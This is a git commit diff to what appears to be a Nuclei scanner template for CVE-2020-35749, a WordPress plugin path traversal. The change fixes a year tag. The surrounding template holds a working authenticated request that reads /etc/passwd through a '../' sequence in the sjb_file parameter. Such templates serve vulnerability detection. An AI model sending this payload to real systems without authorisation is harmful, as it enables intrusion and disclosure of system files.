Update CVE-2020-35749.yaml
parent
f29d2b20df
commit
8664885b45
|
@ -13,7 +13,7 @@ info:
|
|||
cvss-score: 7.7
|
||||
cve-id: CVE-2020-35749
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
|
||||
tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -25,11 +25,9 @@ requests:
|
|||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -39,4 +37,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue